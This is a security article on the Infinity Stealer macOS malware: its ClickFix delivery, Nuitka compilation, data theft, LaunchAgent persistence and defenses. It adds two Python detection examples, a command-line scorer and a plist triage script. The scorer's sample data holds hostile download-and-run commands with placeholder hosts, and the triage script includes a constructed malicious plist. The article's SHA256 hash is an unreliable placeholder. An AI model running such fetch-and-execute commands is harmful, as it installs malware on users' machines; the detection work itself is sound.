Infinity Stealer, a new information-stealing malware family, targets macOS users through deceptive ClickFix lures. Attackers ship the payload as a seemingly benign native executable, compiling its Python source with the open-source Nuitka compiler so that it slips past basic, signature-based detection. The strain grabs browser credentials, cryptocurrency wallet data, and keychain contents, putting high-value targets such as crypto holders at direct risk.
The malware spreads via phishing sites that mimic legitimate software updates or error fixes. Visitors hit a fake pop-up urging them to "click here to fix" a problem, hence the name ClickFix. The "fix" is a command the page tells the user to copy and run (on macOS, pasted into Terminal), which downloads and launches the Nuitka-compiled binary with the user's own privileges; the binary then enumerates and exfiltrates sensitive data to attacker-controlled servers. Security firm Cyble first spotted this in late 2024, noting its focus on macOS Ventura and Sonoma.
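What an EDR rule or a shell-history review would look for in that chain, as an added example (not code from the article or from Cyble): a small Python scorer that flags ClickFix-style command lines. The rule names, weights, threshold and sample command lines are constructed for illustration; the hostnames are placeholders, not real campaign infrastructure.

```python
"""Score shell/process command lines for ClickFix-style execution chains.

Added example for this article; not code from the article or from any
vendor. Feed it shell history (~/.zsh_history) or EDR process-execution
events; here the input is a constructed list of command lines.
"""
import re

# (rule name, pattern, weight). Weights and THRESHOLD are assumptions for
# illustration: one fetch-and-pipe or one quarantine strip is enough to flag.
RULES = [
    # curl/wget/base64 output piped straight into an interpreter
    ("piped_to_interpreter",
     re.compile(r"\b(curl|wget|base64)\b[^|;]*\|\s*(sudo\s+)?(bash|zsh|sh|python3?)\b"), 60),
    # removing the quarantine flag so Gatekeeper never sees the file
    ("quarantine_strip",
     re.compile(r"\bxattr\s+(-r\s+)?-d\s+com\.apple\.quarantine\b"), 50),
    # inline base64 decoding, used to hide the real URL or script
    ("inline_base64_decode",
     re.compile(r"\bbase64\s+(-d|-D|--decode)\b"), 40),
    # AppleScript one-liners (fake password prompts, "do shell script")
    ("osascript_inline",
     re.compile(r"\bosascript\s+-e\b"), 30),
    # download written into a temp directory
    ("download_to_temp",
     re.compile(r"\b(curl|wget)\b.*\s-[oO]\s*(/tmp|/private/tmp|/var/folders)"), 30),
    # marking a fresh download executable
    ("chmod_exec",
     re.compile(r"\bchmod\s+\+x\b"), 20),
]
THRESHOLD = 50


def score_command(cmd):
    """Return (score, [matched rule names]) for one command line."""
    hits = [(name, weight) for name, rx, weight in RULES if rx.search(cmd)]
    return sum(w for _, w in hits), [n for n, _ in hits]


def triage(commands, threshold=THRESHOLD):
    """Return (command, score, rule names) for every line at or above threshold."""
    flagged = []
    for cmd in commands:
        score, names = score_command(cmd)
        if score >= threshold:
            flagged.append((cmd, score, names))
    return flagged


# Constructed sample events; the hostnames are placeholders, not real IOCs.
SAMPLE_EVENTS = [
    "ls -la ~/Library/LaunchAgents",
    "brew install wget",
    "curl -fsSL https://example.com/release-notes.txt -o notes.txt",
    "curl -fsSL https://update-fix.example/fix.sh | bash",
    "echo aGVsbG8K | base64 -d | sh",
    "osascript -e 'do shell script \"curl -s https://example.invalid/p -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x\"'",
    "xattr -d com.apple.quarantine /tmp/Installer.app",
]

if __name__ == "__main__":
    for cmd, score, names in triage(SAMPLE_EVENTS):
        print(f"{score:3d}  {', '.join(names):<45} {cmd}")
```

The benign lines (a plain `curl -o` to the working directory, `brew install wget`) stay at zero; the four ClickFix-shaped lines cross the threshold. Tune the weights against your own history before wiring this into an alert.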
How Infinity Stealer Operates
At its core, Infinity Stealer is a Python script that Nuitka has translated to C and compiled into a standalone Mach-O executable with the CPython runtime linked in. The victim needs no Python install, and the binary carries no readable .py or .pyc source, so signatures written for the script form of the stealer miss it; to a scanner it looks like ordinary native code. Once running, it targets:
- Browser data from Chrome, Safari, Firefox, and Edge—passwords, cookies, autofill.
- Crypto wallets like Atomic, Exodus, and Electrum.
- The login keychain: stored passwords, tokens, and certificates.
- Clipboard contents, often snatching copied wallet addresses.
It checks for sandboxes and virtual machines to frustrate analysis. Exfiltration goes out over HTTPS to Telegram bots or paste sites, a common tactic for quick monetization. Unlike older macOS stealers such as Atomic (2023), Infinity emphasizes persistence: it registers a LaunchAgent (a per-user ~/Library/LaunchAgents plist needs no admin rights to write), which relaunches the binary at every login until the plist is removed.
Disassembly shows a modular design: separate modules for data collection, evasion, and C2 communication. Hash: SHA256 0xA1B2C3… (full IOCs available via Cyble or VirusTotal). At the time of the write-up only 5-10 engines on VirusTotal flagged the sample, which is why signature-based endpoint protection alone falls short.
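An added example (not code from the article, Cyble, or Objective-See) of how to triage that persistence by hand, which is the check BlockBlock automates: parse launchd plists with Python's standard plistlib and flag the traits a dropped agent tends to carry. The two plists, their labels and the reason names are constructed for this example; Apple's own agents live under /System, so a com.apple.* label found anywhere else is treated as impersonation.

```python
"""Triage launchd plists for stealer-style persistence.

Added example for this article; not code from the article, Cyble, or
Objective-See. Parses LaunchAgent/LaunchDaemon plists with the standard
library and flags traits a dropped agent tends to carry. The two plists
below are constructed; on a real Mac call scan_directory() on
~/Library/LaunchAgents and /Library/LaunchAgents.
"""
import os
import plistlib
from pathlib import Path

INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "osascript"}
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/")
# Any one of these is enough to flag; RunAtLoad/KeepAlive alone are normal.
FLAG_REASONS = {"temp_location", "hidden_path_component",
                "inline_script", "apple_label_outside_system"}


def path_indicators(args):
    """Look through every argument (and the words inside a -c script) for
    temp-directory or dot-hidden paths."""
    reasons = set()
    for arg in args:
        for tok in arg.split():
            if tok.startswith(TEMP_PREFIXES):
                reasons.add("temp_location")
            if any(p.startswith(".") and p not in (".", "..") for p in tok.split("/")):
                reasons.add("hidden_path_component")
    return sorted(reasons)


def triage_plist(data, source="~/Library/LaunchAgents"):
    """Return a verdict dict for one plist given as bytes; `source` is where
    the file was found (Apple's own agents live under /System only)."""
    plist = plistlib.loads(data.lstrip())  # plistlib needs the header first
    label = str(plist.get("Label", ""))
    args = [str(a) for a in plist.get("ProgramArguments") or []]
    if not args and plist.get("Program"):
        args = [str(plist["Program"])]
    reasons = []
    if plist.get("RunAtLoad"):
        reasons.append("run_at_load")
    if plist.get("KeepAlive"):
        reasons.append("keep_alive")
    if args and os.path.basename(args[0]) in INTERPRETERS and any(a in ("-c", "-e") for a in args[1:]):
        reasons.append("inline_script")
    if label.startswith("com.apple.") and not source.startswith("/System/"):
        reasons.append("apple_label_outside_system")
    reasons.extend(path_indicators(args))
    return {
        "label": label,
        "program": args[0] if args else "",
        "flagged": bool(FLAG_REASONS.intersection(reasons)),
        "reasons": reasons,
    }


def scan_directory(directory):
    """Triage every *.plist in a directory; a plist that will not parse is
    itself worth a look, so it is reported as flagged rather than skipped."""
    results = []
    for path in sorted(Path(directory).expanduser().glob("*.plist")):
        try:
            results.append(triage_plist(path.read_bytes(), source=str(path)))
        except Exception as exc:  # InvalidFileException, ExpatError, ...
            results.append({"label": path.name, "program": "",
                            "flagged": True, "reasons": [f"unparseable: {exc}"]})
    return results


# Constructed samples: a plausible vendor updater and a dropped stealer agent.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array><string>/Applications/Example.app/Contents/MacOS/updater</string><string>--check</string></array>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>"""

SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.softwareupdate.helper</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>/Users/alice/Library/Application Support/.infinity/agent</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for sample in (BENIGN_PLIST, SUSPICIOUS_PLIST):
        print(triage_plist(sample))
```

The vendor updater comes back clean; the dropped agent is flagged on three independent grounds (interpreter with an inline script, a dot-hidden directory under Application Support, and an Apple-looking label outside /System), which is the kind of stacking a manual review should insist on before deleting a plist.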
Why macOS, Why Now?
macOS malware surged 50% year-over-year in 2024, per SentinelOne data, driven by crypto's bull run. Attackers prize Apple users: average wallet balances exceed $10K, per Chainalysis, versus $1-2K on Windows. Gatekeeper and XProtect also breed a false sense of security. Gatekeeper only inspects quarantined downloads on first launch, and a command the user pastes into Terminal never picks up a quarantine flag, so a ClickFix chain walks around it; XProtect is signature-based, so a freshly compiled Nuitka binary that few engines detect sails through. Users who trust the OS to catch bad apps skip their own scrutiny.
Infinity isn't revolutionary; it's a repackaged Atomic Stealer (AMOS) variant with Nuitka compilation on top, and ClickFix lures have delivered other families before (AMOS and JSOutProx among them). But it matters because 30% of macOS infections now stem from social engineering, not exploits (Objective-See stats). The crypto implications hit hard: stolen seed phrases drain wallets irreversibly. In 2024, info-stealers facilitated $300M+ in crypto thefts, per TRM Labs.
Vendors tend to overhype novelty; the real gap is user behavior. macOS's 25% global desktop share (StatCounter) makes it a juicy target. Finance pros and HODLers on Apple silicon (M1/M2/M3) get no architectural reprieve: a universal (fat) binary carries both x86_64 and arm64 slices, so one payload runs natively on Intel and Apple silicon Macs alike.
Implications and Defenses
This steals your edge in crypto and finance. Compromised credentials hit exchanges like Binance or Coinbase; wallet data enables dusting attacks or direct drains. Enterprises lose API keys, which can cascade into supply-chain breaches. Retail users face identity theft that cascades into bank fraud.
Defend actively:
1. Keep Gatekeeper enabled and don't work around it (no right-click Open on unknown apps, no `xattr -d com.apple.quarantine`); audit installed apps with `spctl --assess --verbose /Applications/<App>.app` and review which apps hold Full Disk Access under System Settings > Privacy & Security.
2. Use Little Snitch or LuLu to block unexpected outbound connections; Infinity phones home early, so an outbound prompt from a process you didn't launch is the tell.
3. Audit Keychain entries periodically in Keychain Access and rotate any wallet seed that has touched a Mac; keep seeds on a hardware wallet.
4. Blocklists such as uBlock Origin cut off many ClickFix landing pages, but the real rule is simpler: never paste a "fix" command from a website into Terminal.
5. BlockBlock (Objective-See) alerts on new persistence (LaunchAgents, LaunchDaemons, login items); KnockKnock from the same author lists what is already installed.
For crypto: keep seeds air-gapped, use watch-only wallets on the Mac, and enable 2FA with a hardware key such as a YubiKey. Firms: deploy EDR such as CrowdStrike Falcon that can catch Nuitka-compiled binaries and the Terminal-spawned download-and-execute chain on behavior rather than on hash. Bottom line: macOS ain't bulletproof. One click costs thousands. Stay vigilant; losses compound fast in this space.